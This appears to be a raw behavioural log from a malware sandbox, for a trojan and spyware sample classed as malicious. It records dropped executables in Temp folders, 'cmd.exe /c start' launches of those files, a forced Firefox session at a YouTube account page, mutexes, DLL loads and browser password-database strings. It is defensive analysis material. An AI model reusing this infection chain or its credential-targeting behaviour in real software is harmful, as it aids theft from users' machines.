Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@44/53@22/10
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C227030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 8_2_6C227030
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8052
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7176:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7376:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6704
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess848
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 8ec8c5c339.exe, 00000008.00000002.2758711410.000000001CA62000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2779054988.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2780920957.000000006C3FF000.00000002.00000001.01000000.0000000B.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 8ec8c5c339.exe, 00000008.00000002.2758711410.000000001CA62000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2779054988.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2780920957.000000006C3FF000.00000002.00000001.01000000.0000000B.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 8ec8c5c339.exe, 00000008.00000002.2758711410.000000001CA62000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2779054988.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2780920957.000000006C3FF000.00000002.00000001.01000000.0000000B.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 8ec8c5c339.exe, 00000008.00000002.2758711410.000000001CA62000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2779054988.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2780920957.000000006C3FF000.00000002.00000001.01000000.0000000B.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: 8ec8c5c339.exe, 8ec8c5c339.exe, 00000008.00000002.2758711410.000000001CA62000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2779054988.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2780920957.000000006C3FF000.00000002.00000001.01000000.0000000B.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 8ec8c5c339.exe, 00000008.00000002.2758711410.000000001CA62000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2779054988.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: 8ec8c5c339.exe, 00000008.00000002.2758711410.000000001CA62000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2779054988.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2780920957.000000006C3FF000.00000002.00000001.01000000.0000000B.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 8ec8c5c339.exe, 00000008.00000003.2421887599.00000000229E9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 8ec8c5c339.exe, 00000008.00000002.2758711410.000000001CA62000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2779054988.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: 8ec8c5c339.exe, 00000008.00000002.2758711410.000000001CA62000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2779054988.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: 8NjcvPNvUr.exe Virustotal: Detection: 52%
Source: 8NjcvPNvUr.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 8ec8c5c339.exe String found in binary or memory: ft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d
Source: 8ec8c5c339.exe String found in binary or memory: m/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe File read: C:\Users\user\Desktop\8NjcvPNvUr.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\8NjcvPNvUr.exe "C:\Users\user\Desktop\8NjcvPNvUr.exe"
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe "C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe "C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe "C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe "C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe"
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingHJDBKJKFIE.exe"
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Process created: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe "C:\Users\user\AppData\RoamingHJDBKJKFIE.exe"
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userKFHCAEGCBF.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\userKFHCAEGCBF.exe "C:\Users\userKFHCAEGCBF.exe"
Source: C:\Users\userKFHCAEGCBF.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8052 -s 2432
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6704 -s 1312
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2336 -parentBuildID 20230927232528 -prefsHandle 2272 -prefMapHandle 2256 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fac9cc89-eaa9-45bc-9cd9-39fa408611c3} 7664 "\\.\pipe\gecko-crash-server-pipe.7664" 238e766c110 socket
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe "C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe "C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe"
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 848 -s 1028
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2312 -parentBuildID 20230927232528 -prefsHandle 2256 -prefMapHandle 2240 -prefsLen 25359 -prefMapSize 238769 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {77cf4557-a063-4b0f-83a1-cb60c77939fe} 2116 "\\.\pipe\gecko-crash-server-pipe.2116" 28621a6eb10 socket
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe "C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe "C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe"
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingHJDBKJKFIE.exe"
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userKFHCAEGCBF.exe"
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe "C:\Users\user\AppData\RoamingHJDBKJKFIE.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\userKFHCAEGCBF.exe "C:\Users\userKFHCAEGCBF.exe"
Source: C:\Users\userKFHCAEGCBF.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2336 -parentBuildID 20230927232528 -prefsHandle 2272 -prefMapHandle 2256 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fac9cc89-eaa9-45bc-9cd9-39fa408611c3} 7664 "\\.\pipe\gecko-crash-server-pipe.7664" 238e766c110 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2312 -parentBuildID 20230927232528 -prefsHandle 2256 -prefMapHandle 2240 -prefsLen 25359 -prefMapSize 238769 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {77cf4557-a063-4b0f-83a1-cb60c77939fe} 2116 "\\.\pipe\gecko-crash-server-pipe.2116" 28621a6eb10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: mstask.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: dui70.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: duser.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: chartv.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: winsta.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Section loaded: pcacli.dll
